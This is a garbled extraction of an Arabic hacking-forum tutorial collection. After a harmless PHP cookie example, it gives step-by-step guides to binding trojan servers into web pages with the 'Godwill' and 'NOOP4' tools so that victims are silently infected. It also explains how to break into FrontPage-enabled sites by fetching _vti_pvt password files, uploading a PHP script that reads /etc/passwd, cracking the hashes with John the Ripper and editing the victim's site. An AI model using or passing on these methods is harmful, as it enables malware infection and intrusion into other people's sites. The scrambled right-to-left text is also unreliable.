com : the best Hacking forum‬‬ ‫>‪<body/‬‬ ‫>‪<html/‬‬ ‫قراءة الكعكات من جهاز العميل‬ ‫ كيف تستقبل المتغيرات من الكعكة ‪:‬‬‫كما قلنا بانه بامكانك ارسال اكثر من كعكة الى متصفح واحد ‪..php‬‬ ‫وإليك الكود الخاص بكل ملف ‪:‬‬ ‫‪ -1‬الملف ‪: user.php‬إحدى صفحات الموقع و التي تستفيد من خدمات الملف ‪.‬‬ ‫مثال ‪:‬‬ ‫‪:code‬‬ ‫>?‬ ‫‪.['echo $_COOKIE['site‬‬ ‫?<‬ ‫و هذه تطبع ‪:‬‬ ‫‪:code‬‬ ‫‪palhackerz.‬تسهل عليك قراءة هذه الكعكات و تخزنها في مصفوفة اسمها‬ ‫‪ $_COOKIE‬و هي مصفوفة من النوع ‪ Associative Arrays‬بحيث ان المفتاح هو اسم الكعكة و‬ ‫القيمة قيمة الكعكة كما ارسلتها ‪..php‬‬ ‫‪:code‬‬ ‫>?‬ ‫‪-----------------------*/‬‬ ‫‪151‬‬ .php‬يقوم الملف بعمليتين ‪:‬‬ ‫‪ <-‬الولى ‪ :‬تحديد اللون الذي اختاره الزائر ‪.. user.."echo " palhackerz.‬‬‫‪ <-‬الثانية ‪ :‬عرض نموذج اختيار الللون و حفظ اللون المختار‬‫‪ -2‬الملف ‪ index.‫>‪<body‬‬ ‫>? ‪<? .‬‬ ‫عندما يطلب المستخدم من متصفحِه صفحة على موقعك فان المتصفح يقوم بارسال جميع الكعكات التي قمت‬ ‫انت بزراعتها عند المستخدم ‪ PHP .com‬‬ ‫تطبيق ‪ :‬تخصيص لون الخلفية‬ ‫كمثال بسيط دعنا نقوم بانشاء موقع مبسط و نستخدم الكعكات لكي نحفظ لون الخلفية المحببة الى الشخص ‪.‬‬ ‫ ماذا لدينا ؟‬‫‪ -1‬الملف ‪ : user.

.Cookies-Based Background Selector <Created By : "Rasha"<rasha@h4palestine.Color Clearing Form --!> <"form name=color_clear method="GET> <"INPUT type="hidden" name="do" value="clear_color> <"‫="ل تتذكر لوني المفضل‬INPUT type="submit" value> <FORM/> ?> { 152 .Color setting Form --!> <"form name=color_select method="GET> <"INPUT type="hidden" name="do" value="set_color> "=INPUT name="color" type="text" value> <"<? ..com For : h4palestine.()echo get_color ?> <"‫="احفظ اللون‬INPUT type="submit" value> <FORM/> <-.com /*------------------------- }()function display_form <? <html> <body> <-.

$_GET['color'].('header('Location:index.(setcookie('color'."return "#FFFFFF { { }()function clear_color .['return $_COOKIE['color }else{ .php { }()function get_color .(setcookie('color'.time()-36000 .time()+36000 .global $_GET .global $_COOKIE }((['if(isset($_COOKIE['color .}()function set_color .('header('Location:index.$_GET['color'].php { selection // }('if ($do=='display_form .()display_form 153 .

.‬‬‫‪ -2‬ملف الـ ‪: index.()set_color‬‬ ‫{‪}("elseif ($do=="clear_color‬‬ ‫‪.php‬‬ ‫ملف عادي جدًا ال انه يطلب الدالة ‪ get_color‬من ملف ‪ user.php‬كما يلي ‪:‬‬ ‫‪:code‬‬ ‫>‪<html‬‬ ‫>‪.php‬‬ ‫‪<"<? ()echo get_color‬‬ ‫>‪<h1‬مرحبا بك ‪<h1/>.‬‬ ‫>‪<br‬‬ ‫يمكنك تخصيص لون الخلفية من هنا‬ ‫>‪<br‬‬ ‫>‪ <"a href="user.‬‬‫ الدالة الثانية ‪ set_color‬تقوم بحفظ اللون المختار في كعكة و ترجع المستخدم الى الصفحة الرئيسية ‪.php?do=display_form‬صفحة تخصيص اللون>‪<a/‬‬ ‫>‪<body/‬‬ ‫>‪<html/‬‬ ‫انتهى‪،،،‬‬ ‫‪154‬‬ ..()clear_color‬‬ ‫{‬ ‫?<‬ ‫ الدالة الولى ‪ display_form‬تقوم فقط بعرض نموذج اختيار اللون ‪...‬‬ ‫ الدالة الرابعة ‪ clear_color‬تقوم بمسح الكعكة بالطريقة التي ذكرناها في الدرس ‪.‫{‪}("elseif ($do=="set_color‬‬ ‫‪.‬‬‫ الدالة الثالثة ‪ get_color‬ترجع قيمة اللون من الكعكة و اذا لم يكن هنالك قيمة فانها ترجع لون افتراضي‬‫وهو البيض ‪.('BODY bgcolor="<? include('user.

‫" شرح برنامج السطورة ‪God Will‬في تلغيم الصفحات "‬ ‫>ةةةةة ةة ةةةةة ةةة ةةة<‬ ‫>ةةةةةة‪ :‬ةة ةةةة<‬ ‫كل ما يلزمنا هو ‪:‬‬ ‫** ملف الــ ‪ html‬الذي تريد تلغيمه‪.‬يجب أن يكون أقل من ‪ 34‬بايت (‬ ‫** برنامج السطورة ‪ Godwill‬لتلغيم الصفحة‪.‬‬ ‫** ملف الباتش الذي تريد وضعه في الصفحة‪ ).‬‬ ‫و تجد هذا البرنامج في اللينك التالي‪:‬‬ ‫‪155‬‬ .

..‬‬ ‫‪156‬‬ .‫‪http://www.zip‬‬ ‫و السيريال نامبر‪tlsecurity :‬‬ ‫لنبدأ‪:‬‬ ‫بعد تجهيز ملف الــ ‪ html‬المراد تلغيمه‪ ،‬و ملف الباتش‪ ،‬شغل برنامج ‪ Godwill‬بعد تحميل‪ ،‬و ستجد‬ ‫أمامك النافذة التالية‪.geocities...com/love2002_il/godwill16.‬‬ ‫اضغط على زر ‪ html‬لتجد نفسك في النافذة التالية‪.

..‬‬ ‫اتبع التعليمات الموجودة في هذه النافذة‪ ،‬و من ثم اضغط الزر ‪Done‬‬ ‫بعدها ستنتقل إلى النافذة التالية‪.‬‬ ‫‪157‬‬ .‫اضغط على الخيار ‪ General Options‬لتنتقل للنافذة التالية‪...

enter Output 3‬و هذا‬ ‫الملف يمثل الصفحة الملغومة‪.co.‬‬ ‫و هون بقى ‪ ،‬أنت بتعرف شغلك‪.‬‬ ‫انتهى‪،،،‬‬ ‫‪158‬‬ .‬سيقوم الباتش بتحميل نفسه بنفسه بدون أن يحس الضحية بأي شيء‬ ‫) طبعا إل إذا كان لديه ‪ ( zone Alarm‬و عند إعادته لتشغيل الكمبيوتر‪ ،‬سيقوم الباتش بتشغيل نفسه‪ ...‬‬ ‫عند فتح الضحية لصفحتك الملغومة‪ ...‬‬ ‫قم بتحميل الصفحة على إحدى المواقع المستضيفة للصفحات مثل‬ ‫‪ /http://www..‬و‬ ‫ستصلك رساله منه برقم أي بي جهاز الضحية و رقم البورت الذي تم فتحه‪..tripod...lycos...‫اضغط زر ‪Gen‬‬ ‫سيظهر لك في مجلد البرنامج ملف له نفس السم الذي وضعته في الحقل رقم ‪ ...uk‬و احتفظ بعنوان صفحتك الملغومة جيدا‪.

godwill‬‬ ‫هذا البرنامج من اجل دمج بالباتش وتهيئة علي اساس انه صفحه علي النت‬ ‫اسم البرنامج هو ‪noob 4..‬‬ ‫ول يجعلك ترتبط لحجم معين مثل برنامج ‪.®MoHfOx®.5‬‬ ‫‪4‬و ‪ 5‬هما الي تحديد نوع الملفات المستخدمه في الدمج‬ ‫‪ -6‬هي ما سوف يقوم البرنامج بدمجه مع الصفحه من ملفات‬ ‫‪159‬‬ .0‬‬ ‫من ااجل عيون الجوكر والجميع =======================================‬ ‫=============================‬ ‫‪ -1‬البرنامج‬ ‫الصوره توضح ما هوالشرح عند ضغطك علي البرنامج وفتحه سوف تاتي هذه الشاشه‬ ‫=================‬ ‫======================‬ ‫=============================‬ ‫‪ layout 2‬للبرنامج‪<<<<====:::‬‬ ‫هو خاص بتكوينات الصفحه وينقسم الي ‪ 6‬اجزاء‬ ‫‪ -2‬خاصه بتكوين الصفحه لمستخدمي ‪Internet Explorer 5‬‬ ‫‪ -3‬خاص بتكوين الصفحه لمستخدمي ‪Internet Explorer5.§¤ :‬‬ ‫وهو ل يرتقى إلى مستوى ‪ god will‬لكنه خفيف جدا ‪.‫" وداعا ً للبرنامج السطورة ومرحبا ببرنامج ‪"NOOP4‬‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪< ¤§.

‫==================================================‬ ‫===================‬ ‫‪ executable file 3‬لختيار الباتش ‪<<<<====:::‬‬ ‫‪ -7‬لتحديد مكان الباتش من علي الجهاز‬ ‫‪ -8‬للبداء في تكوين الباتش‬ ‫=======================================‬ ‫=============================‬ ‫‪ -9‬هو اخر المطاف هو انهاء العدادت لتكوين الباتش مع الصفحه‪<<<<====:::‬‬ ‫‪160‬‬ .

‫وفي نهايه عمل البرنامج يعطي لك المكان الذي تريد ان يحفظ في الصفحه المدموجه‪.‬‬ ‫وصلة البرنامج‪..‬‬ ‫انتهى‪،،،‬‬ ‫‪161‬‬ ..

O. SQL‬‬ ‫و بالنسبة لمدارء المواقع ‪ Webmasters‬فإن البرنامج المفضل لهم لتصميم مواقعهم هو ‪Microsoft‬‬ ‫‪ Office FrontPage‬و الذي كما هو مبين يأتي‬ ‫‪162‬‬ . Language‬‬ ‫و اذكر أخيرًا بأني اؤمن بأن المخترق ما هو إل انسان وظيفته البرمجة و ادارة و تحليل النظم و الشبكات و‬ ‫ليس انسان همه هو معرفة القليل‬ ‫من المور التي تساعده في التخريب و العبث بما تعب به الخرون و تضييع الوقت في الدردشة و التسكع‬ ‫بمقاهي النترنت ‪ ،‬و لذا فافترض بأن‬ ‫ما أقوله سيكون واضحًا و ل يحتاج لـ ‪.‬ما الذي ستسفيده عند قراءة الموضوع ؟‬ ‫‪ .‬‬ ‫@ مقدمة ‪:‬‬ ‫تسعى شركات التسكين بأنواعها توفير شتى شبل الراحة لعملئها ‪ ،‬فتجدهم يقدمون العروض و التخفيضات‬ ‫لرضاء العملء مثل دعم لـ ‪ PHP‬و‬ ‫‪ CGI‬و ‪ Perl‬و ‪ SSL‬و ‪ FTP‬و ‪. FrontPage Server Extensions‬‬ ‫* آلية عمله ‪.‬‬ ‫* بعض الطرق للستفادة منه عند التصال بالخادم الخاص به ‪.‬مقدمة‬ ‫‪ . Telnet‬‬ ‫* كيفية التعامل مع بروتوكول ‪. ( DeXXa :‬‬ ‫ما الذي يجب أن تعرفه قبل قراءة هذا الدرس ‪:‬‬ ‫* اللمام بالنجليزية ‪.‬ما هي آلية عمل الـ ‪ FrontPage Extension Server‬؟‬ ‫‪ . HTTP‬‬ ‫* كيفية التعامل مع قواعد البيانات العلئقية ‪.‬كيفية استغلله ليصبح في صلحك‬ ‫@ ما الذي ستستفيده عند قراءتك للموضوع ؟‬ ‫* ستعرف ما هو الـ ‪.‬كيفية معرفة هل الموقع يدعم الـ ‪ FrontPage‬أم ل‬ ‫‪ . SQL‬‬ ‫* كيفية التعامل مع أحد لغات الويب و التي تعمل بناحية الخادم ‪Server Side Scripting‬‬ ‫‪. Screen Capture‬‬ ‫@ خريطة الموضوع ‪:‬‬ ‫‪ .‬‬ ‫* كيفية التعامل مع برنامج ‪. ( T.L.‬‬ ‫* قراءة المزيد عن الـ ‪ FrontPage Server Extensions‬و ليس كيفية اختراقه ‪.‬‬ ‫* كيفية جمع المعلومات الخاصة بأي موقع ‪. Microsoft Office FrontPage‬‬ ‫* كيفية التعامل مع الـ ‪. CHMOD‬‬ ‫* كيفية التعامل مع الـ ‪.‬ما هو الـ ‪ FrontPage Server Extensions‬؟‬ ‫‪ .‫" معلومات مهمة عن المواقع التي تدعم الفرونت بيج "‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪<.‬كيفية التصال بـ ‪FrontPage Extension Server‬‬ ‫‪ .

‬‬ ‫ الملف ‪ : service.‬‬ ‫* المجلد _‪: vti_pvt‬‬ ‫و يتواجد بداخله عدة ملفات ما يهمنا منها هو الملفات التالية ‪:‬‬ ‫ الملف ‪ : service.‫مع حزمة ‪ ، Office‬اذ يتميز بسهولة استعماله كما انه يوفر بعض البرمجيات مثل عداد الزوار ‪ ،‬و لذا تقدم‬ ‫شركات التسكين دعم كامل للبرنامج ‪.btr‬و ‪ : doctodep..pwd‬و فيه يتواجد المعرف و كلمة المرور الخاصة بالمشرف مشفرة بمقياس ‪DES‬‬‫‪. authors‬‬‫ ملفي ‪ deptodoc.exe/.‬يقوم‬ ‫بمنع الجميع ) المالك و المجموعة و‬ ‫‪163‬‬ ..‬‬ ‫‪fpcount.exe/.‬‬ ‫كما يوجد ملفان هما ‪:‬‬ ‫‪shtml.‬‬ ‫الثاني ل يهمنا بقدر ما يهم المجلد الول اذ أنه الخاص بالمشرف ول تستطيع الستفادة منه اذا لم تحصل على‬ ‫كلمة المرور الخاصة به ‪.btr‬و فيه يتواجد مسارات الملفات التي تم تحميلها على‬‫الخادم ‪ ،‬فاذا قمت بتنزيله فتستطيع معرفة الملفات‬ ‫الموجودة بالموقع ‪.‬‬ ‫@ ما هو الـ ‪ FrontPage Server Extensions‬؟‬ ‫) ملحظة ‪ :‬سأتكلم حاليًا عن الحزم التي أتت بعد حزمة الصدار الثاني (‬ ‫هو عبارة عن حزمة من البرامج يتم تثبيتها في الخادم ‪ Server‬الخاص بشركة التسكين التي لها قالبية‬ ‫لدعم بعض الخصائص ‪..‬‬ ‫‪/vti_aut_/.‬‬ ‫و في الغالب ل تستطيع معاينة محتويات المجلد اذ يوجد في المجلد الرئيسي للموقع ملف ‪ htaccess..grp‬و فيه يتواجد المعرفين من مشرفين و ‪.‬‬ ‫و عند التثبيت يجب انشاء عدة مجلدات منها ‪:‬‬ ‫‪private_/‬‬ ‫‪vti_bin_/‬‬ ‫‪vti_cnf_/‬‬ ‫‪vti_log_/‬‬ ‫‪vti_pvt_/‬‬ ‫‪vti_txt_/‬‬ ‫و سأتكلم عن وظيفة كل مجلد يهمنا ‪:‬‬ ‫* المجلد _‪: vti_bin‬‬ ‫و يتواجد بداخله مجلدان هما ‪:‬‬ ‫) ملحظة ‪ :‬النقطتان تشيران إلى المجلد _‪( vti_bin‬‬ ‫‪/vti_adm_/.

Open Web‬‬ ‫* قم باضافة المعرف و كلمة المرور ) الصلية و ليست المشفرة ( ‪.‬‬ ‫) ملحظة ‪ :‬ان عدم وضع أي صلحية على المجلدل يعني بأنها تعتبر ثغرة و لكن ضعف من الناحية (‬ ‫* المجلد _‪: private‬‬ ‫و يتواجد بداخله ملف واحد فقط هو ‪.‬‬ ‫* اذا كانت صحيحة سيظهر لك الخادم ملفات الموقع كلها و عندها تستطيع التحميل و التعديل في الملفات و‬ ‫المجلدات و معاينة الشفرة المصدرية‬ ‫للملفات ‪. htaccess.‬‬ ‫@ كيفية معرفة هل الموقع يدعم الـ ‪ FrontPage‬أم ل ‪:‬‬ ‫يوجد العديد من الطرق لمعرفة قابلية الموقع لدعم الفرونت بيج نذكر منها ‪:‬‬ ‫* معاينة ملف نجاح التثبيت ‪:‬‬ ‫) ملحظة ‪ :‬قد ل تجد ملف _‪ vti_inf. HTTP‬‬ ‫فلو اردنا معاينة عداد الزوار عن طريق برنامج الـ ‪ FrontPage‬فانه يتم ارسال طلب ‪ Request‬للخادم‬ ‫ثم يمرره الخادم بالـ ‪FrontPage Extension Server‬‬ ‫و الذي يمرره بالتالي ببرمجيات الخادم مثل ‪ ، fpcount. Office‬‬ ‫* من قائمة ‪ File‬قم باختيار ‪.html‬بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ‪ ،‬مثال ‪:‬‬ ‫‪164‬‬ .‬‬ ‫@ ما هي آلية عمل الـ ‪ FrontPage Extension Server‬؟‬ ‫يعتمد التصال بين العميل و الـ ‪ FrontPage Extension Server‬على بروتوكول الـ ‪.‫الزوار ( من معاينة المجلد و محتوياته ‪.‬‬ ‫@ كيفية التصال بـ ‪: FrontPage Extension Server‬‬ ‫كما ذكرنا سابقًا ان أغلب شركات التسكين تسعى لراحة العملء ‪ ،‬فتجدها تدعم خدمة الـ ‪ FrontPage‬و‬ ‫ذلك لتحميل الصفحات للموقع علمًا بأنها‬ ‫تدعم بروتوكول الـ ‪ FTP‬و تحميل الملفات و انشاء المجلدات عبر المتصفح اعتمادًا على البرمجيات التي‬ ‫تعمل بناحية الخادم ‪.exe‬و من ثم يكرر تمريره مرة أخرى إلى الـ‬ ‫‪ Extension Server‬و إلى الخادم و يظهر المخرجات‬ ‫لـ العميل ‪ ،‬علمًا ان هذه التصالت تتم عبر جدار نار ‪.‬‬ ‫* اذا لم تتم العملية بنجاح فهذا يعني بأن الموقع ل يدعم الخدمة أو أن المعرف أو كلمة المرور خاطئة و‬ ‫يطلب منك معاينتها في وضعية القراءة و ل‬ ‫يظهر لك الشفرة المصدرية الصلية ول المجلدات و الملفات التي يحويها الموقع ‪.‬‬‫‪ -‬قم بمعانية ملف _‪ vti_inf.‬‬ ‫و الن قم بتنفيذ التالي لمعرفة كيفية التصال بالـ ‪: FrontPage Extension Server‬‬ ‫) ملحظة ‪ :‬سأتكلم حاليًا عن حزمة الـ ‪ XP‬و التي ل تختلف أبدًا عن الحزم الباقية إل في بعض النقاط‬ ‫الشكلية (‬ ‫* قم بتشغيل برنامج الـ ‪ FrontPage‬و الذي يأتي مرفقًا مع حزمة ‪.html‬و لكن هذا ل يعني أن الموقع ل يدعم الخدمة ‪ ،‬كما أنه ل‬ ‫يعتبر ثغرة (‬ ‫ قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ ‪ FrontPage‬أم ل ‪.

‬‬‫ ستجد أن الموقع أعطاك بعض المعلومات عن الملقم و الخدمات الموجودة في الموقع الذي تريد معرفة‬‫قابلية دعمه للبرنامج ‪ ،‬و من تلك الخدمات‬ ‫خدمة الـ ‪ FrontPage‬و ستظهر لك بالشكل ‪ mod_frontpage/X‬حيث ‪ X‬يرمز لصدارة الـ‬ ‫‪. X‬‬ ‫* عن طريق موقع ‪: NetCraft‬‬ ‫ قم بزيارة الموقع ‪.Victim. Source Code‬‬‫ قم بالبحث بين ترميزي الرأس >‪ <Head></Head‬عن الشفرة التالية ‪:‬‬‫>‪<"Meta Name="GENERATOR" Content="Programe‬‬ ‫ حيث ‪ Programe‬يرمز لنوع البرنامج و اذا كان البرنامج هو ‪ Microsoft FrontPage X.com/_vti_inf.‬‬‫ قم بمعانية المجلد بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ‪ ،‬مثال ‪:‬‬‫‪http://www.‫‪http://www.net‬‬‫ قم بكتابة عنوان الموقع مستثنيًا الـ ‪. Source Code‬‬‫ قم بالبحث عن ‪ "FPVersion="Version‬حيث ‪ Version‬تشير للصدار الخاص بالخدمة ‪. NetCraft.html‬‬ ‫ و عند معاينة الصفحة ستجد جملة ‪ ، FrontPage Configuration Information‬فهذا معناه أن‬‫حزمة الـ ‪ FrontPage Extension Server‬قد تم تثبيتها‬ ‫في الخادم بنجاح ‪. //:http‬‬‫ انتظر بضع ثواني ‪.‬‬‫ قم بالنقر بزر الفأرة اليمن على الصفحة ‪ ،‬ثم قم باختيار ‪. Source Code‬‬‫ قم بالبحث عن الشفرة التالية ‪:‬‬‫‪vti_generator:Programe‬‬ ‫ حيث ‪ Programe‬يشير لنوع البرنامج و اصدارته و سيكون في حالتنا هو ‪Microsoft‬‬‫‪ FrontPage X‬و الصدارة الخاصة به هي ‪. FrontPage Extensions Server‬‬ ‫* عن طريق الـ ‪: Telnet‬‬ ‫‪165‬‬ .com/_vti_cnf‬‬ ‫ قم بالنقر بزر الفأرة اليمن على الصفحة ‪ ،‬ثم قم باختيار ‪.‬‬ ‫و لمعرفة اصدارة الخدمة قم بالتالي ‪:‬‬ ‫ قم بالنقر بزر الفأرة اليمن على الصفحة ‪ ،‬ثم قم باختيار ‪.Victim. X‬‬ ‫* الكشف عن الشفرة المصدرية للصفحة ‪:‬‬ ‫ قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ ‪ FrontPage‬أم ل ‪.‬‬‫* عن طريق مجلد _‪: vti_cnf‬‬ ‫ قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ ‪ FrontPage‬أم ل ‪.0‬يتبين‬‫لنا بأن الخادم الخاص بالموقع يدعم الفرونت بيج و‬ ‫الصدارة الخاصة به هي ‪.

("open = FOpen($file. Head‬‬‫) ملحظة ‪ :‬عليك اللمام بكيفية التعامل مع بروتوكول ‪( HTTP‬‬ ‫ قم بارسال التالي حيث ‪ http://www.net‬هو البروكسي‬‫الخاص بمزود الخدمة الخاص بك ‪:‬‬ ‫‪Head www.Victim.‬‬‫ ستستلم الجابة ‪ Response‬عن الطلب الذي ارسلتهب للخادم ‪ Server‬مثل تاريخ آخر تعديل للصفحة‬‫و نوع الملقم و الخدمات المتوفرة به ‪.net HTTP/1. FileSize($file$‬‬ ‫‪.1‬‬ ‫‪Host: ISP.‬‬ ‫* قم بتحميل ملف ينتهي امتداده بـ ‪ PHP‬و ضمنه التالي ‪:‬‬ ‫>?‪PHP‬‬ ‫‪.net‬‬ ‫‪*/* :Accept‬‬ ‫‪Connection: close‬‬ ‫ انتظر بضع ثواني ‪.com 80‬‬ ‫ قم بارسال طلب ‪ Request‬للخادم و لتكن الطريقة ‪ Method‬هي ‪.Victim.net‬هو الموقع الضحية و ‪ ISP.((get = FGets($open.Victim.Echo $get‬‬ ‫‪. FrontPage Extensions Server‬‬ ‫@ كيفية استغلله ليصبح في صالحك ‪:‬‬ ‫اذا عثرت على موقع يدعم هذه الخدمة و لم يتم وضع صلحيات على مجلد الـ _‪ vti_pvt‬قم بالتالي ‪:‬‬ ‫) ملحظة ‪ :‬عليك اللمام بلغة تعمل على ناحية الخادم و في حالتنا فهي الـ ‪ ، PHP‬كما أن على الموقع‬ ‫الضحية دعم هذه اللغة (‬ ‫* قم بالتصال بالموقع الضحية ‪.FClose $open‬‬ ‫?<‬ ‫‪166‬‬ .‬‬ ‫و من ضمن الخدمات ستجد نفس الذي وجدناه في الطريقة السابقة و هو أن خدمة الـ ‪ FrontPage‬و‬ ‫ستظهر لك بالشكل ‪mod_frontpage/X‬‬ ‫حيث ‪ X‬يرمز لصدارة الـ ‪.‫) ملحظة ‪ :‬تساعد هذه الطريقة في معرفة بعض المعلومات عن الخادم و المخرجات هي نفس مخرجات‬ ‫الطريقة السابقة (‬ ‫ من قائمة ‪ Start‬قم باختيار ‪ Run‬و اكتب بالنافذة التي ستظهر ‪. "r$‬‬ ‫‪. Telnet‬‬‫ قم بالتصال بالموقع عبر المنفذ ‪ 80‬بالشكل التالي ‪:‬‬‫‪Microsoft Telnet> Open www.

.Victim.com/uploded_file...‫و قمنا هنا برفع ملف ‪ PHP‬للخادم يقوم بفتح ملف غير معين ثم يحضر محتوياته على حسب حجمه بالبايت‬ ‫ثم يعرضه ثم يغلق الملف ‪ ،‬و الن كل‬ ‫ما عليك فعله الن هو الدخول على الموقع عبر المتصفح و الحاقه بـ بعنوان الملف الذي حملته و المتغير‬ ‫‪ file‬و الملف الذي تريد معاينة الشفرة‬ ‫المصدرية الخاصة به ‪ ،‬مثال ‪:‬‬ ‫‪http://www..‬‬ ‫انتهى‪،،،‬‬ ‫‪167‬‬ ./../etc/passwd‬‬ ‫حيث ‪ uploded_file‬يشير لسم الملف الذي قمت بتحميله ‪ ،‬و تستطيع اضافة اوامر تسمح لك بمعاينة‬ ‫الملفات و المجلدات الموجودة في الخادم ‪.

com/_vti_pvt‬‬ ‫وأول ماندخله نلحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم‪:‬‬ ‫‪168‬‬ .almodammer.netcraft.almodammer.html‬‬ ‫بعد عنوان الموقع لنفرض أن الموقع‪/http://www.com‬‬ ‫وكتابة اسم الموقع وبعد البحث سوف يظهر‬ ‫‪mod_frontpage/x‬‬ ‫‪)=x‬رقم الصدار الخاص بالفرونت بيج(‬ ‫ عن طريق إضافة جملة‬‫‪/_vti_inf.com‬‬ ‫يدعم ‪ fontpage‬طيب نذهب إلى ملف ‪_vti_pvt‬‬ ‫كذا يعني‬ ‫‪http://www.Unix‬‬ ‫‪ -1‬وسف أقوم الن بشرح طريقة لمعرفة هل هذه المواقع تدعم ‪ frontpage‬أم ل؟‬ ‫بعدة طرق ولن أذكر إل السهل‪:‬‬ ‫ بالذهاب إلى موقع ‪netcraft‬‬‫‪/http://www.‫" اختراق المواقع التي تدعم الفرونت بيج "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫اكثر منا يعلم ان هذه الثغرة خاصة بنظام‪//‬‬ ‫‪NT .com/_vti_inf.com:‬‬ ‫نضيف الجملة ليصبح بهذه الطريقة‬ ‫‪http://www.almodammer.almodammer.almodammer.com/_vti_cnf‬‬ ‫واضغط زر الفأرة اليمن واختار‬ ‫‪ source‬المصدر‬ ‫وابحث عن‬ ‫‪vti_generator:Programe‬‬ ‫حيث‬ ‫‪ Programe‬تعني لنوع برنامج الفرونت بيج والصدارات الخاصة به‬ ‫‪-------------------------------------------------‬‬‫‪ -2‬ألحين وعرفنا الموقع يدعم ‪ frontpage‬كيف نقدر نوصل لملف الباسوورد؟‬ ‫بسيطة إنت هات الموقع الي يبدعم ‪ frontpage‬واعلمك‬ ‫يعني وعلى سبيل المثال‬ ‫‪/http://www.html‬‬ ‫وبعدها اضغط ‪Enter‬‬ ‫وراح يطلعلك في أول الصفحة هذه الكلمة‬ ‫‪Frontpage Configuration Information‬‬ ‫أي قد تم تثبيت مجلدات وبرامج الفرونت بيج‬ ‫ وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم ل‬‫بإضافة‬ ‫‪/_vti_cnf‬‬ ‫بعد عنوان الموقع كهذا المثال‪:‬‬ ‫‪http://www.

pwd‬‬ ‫‪User.‬‬ ‫حتى توصل‬ ‫>\‪c:‬‬ ‫بعدين اكتب‬ ‫‪cd john‬‬ ‫اضغط على ‪Enter‬‬ ‫‪169‬‬ .openwall.pwd‬‬ ‫‪Service.‫=============‬ ‫‪Adminstrator.pwd‬‬ ‫‪Users.pwd‬‬ ‫=============‬ ‫ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلحظ نلحظ وجود‬ ‫‪username:passwd‬‬ ‫اسم المستخدم والباسوورد‬ ‫يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات طلعلي ملف ‪ service‬يحتوي على‬ ‫‪user / password‬‬ ‫وهذا مضمون الملف‬ ‫‪operator:hi9LHn9wAMuKM‬‬ ‫حيث اسم المستخدم‪operator:‬‬ ‫الباسوورد المشفرة هي‪hi9LHn9wAMuKM:‬‬ ‫ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إل نفك تشفيره‬ ‫وهذا يتم ببرامج كثير‬ ‫=)‪=(Crack Jack‬‬ ‫=)‪=(John The Ripper‬‬ ‫راح نستخدم الفضل والكثر تداول وهو‬ ‫‪John The Ripper‬‬ ‫لتحميل البرنامج من هذا الموقع‪::‬‬ ‫‪http://www..com/john‬‬ ‫كيف تفك التشفير بهذا البرنامج‬ ‫أول شي تروح تنقل البرنامج إلى مجلد‬ ‫\‪c:‬‬ ‫بعدين تفتح مجلد ‪RUN‬‬ ‫وتسويلك مستند نصي ‪ txt‬وتسمي الملف ‪ passwd‬وتضع فيه كلمة السر الي تبي تفك تشفيرها‬ ‫إذهب إلى‬ ‫ابدأ ‪start‬‬ ‫تشغيل ‪run‬‬ ‫اكتب المر‬ ‫‪command‬‬ ‫اضغط على ‪ Enter‬وبعدها راح يفتح‬ ‫إطار الـ ‪DoS‬‬ ‫اذهب إلى مجلد ‪RUN‬‬ ‫وذلك بالخروج من المجلدات الي راح تظهر لك واذا تبي تطلع من أي مجلد استخدم المر‬ ‫‪cd.pwd‬‬ ‫‪Author.pwd‬‬ ‫‪Adminstrators.

txt‬‬ ‫‪---------------------------------‬‬‫يبحث عن الحرف الصغيرة‬ ‫====‬ ‫‪john -i:Digits passwd.txt‬‬ ‫‪--------------------------------‬‬‫أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم‬ ‫‪-------------------------------------------------------------------------------‬‬‫وبعد ماتجرب كل هذي الوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد ول ل إذهب إلى‬ ‫‪john.txt‬‬ ‫‪-------------------------‬‬‫يبحث لك عن جميع النواع والحتمالت‬ ‫====‬ ‫‪john -i:Alpha passwd.txt‬‬ ‫‪---------------------------------‬‬‫يبحث عن الرقام‬ ‫====‬ ‫‪john -single passwd.pot‬‬ ‫الموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها‬ ‫‪-------------------------------------------------------------------------------‬‬‫إنت ألحين مستريح عندك ‪ username‬والـ ‪password‬‬ ‫وش بقالك ؟!!‬ ‫يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من‪/‬‬ ‫)‪(1‬‬ ‫‪frontpage‬‬ ‫بعدين‬ ‫‪ file‬وتذهب إلى‬ ‫‪ open web‬وتضيف‬ ‫السم والباسوورد وعاد كذا انت الحين تقدر تعدل الملفات على كيفك‬ ‫)‪(2‬‬ ‫من ‪FTP‬‬ ‫وعليك ببرامج الـ ‪ FTP‬المنتشرة‬ ‫كالـ ‪ws-ftp‬‬ ‫والـ ‪pro ftp‬‬ ‫‪170‬‬ .‫وراح يظهر لك بهذا الشكل‬ ‫>‪c:\john‬‬ ‫واكتب‬ ‫‪cd RUN‬‬ ‫وبتدخل المجلد ليصبح بهذه الطريقة‬ ‫>‪c:/john/RUN‬‬ ‫ألحين نكتب أوامر برنامج ‪John The Ripper‬‬ ‫وهي‬ ‫====‬ ‫‪john -i:all passd.

